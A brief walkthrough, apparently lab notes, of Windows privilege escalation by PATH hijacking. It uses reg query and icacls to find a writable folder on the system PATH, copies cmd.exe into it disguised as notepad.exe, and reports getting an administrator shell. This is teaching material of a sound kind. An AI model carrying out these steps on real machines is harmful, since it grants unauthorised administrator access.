First: Take a look at the Path Environment Variable

reg query "HKLM\System\CurrentControlSet\Control\Session Manager\Environment"

Notice that there is a path called C:\RTO\Bin which means if we can write to this path we can hijack the execution of any program

Second: Checking if we have write access to that folder

icacls C:\RTO\bin

And we have modified access to that folder

Third: Copy you malicious payload to that folder

copy c:\Windows\System32\cmd.exe C:\RTO\bin\notepad.exe

Now anyone using CMD and trying to open Notepad it will open a new CMD session let’s try this as admins

notepad.exe

And we are administrator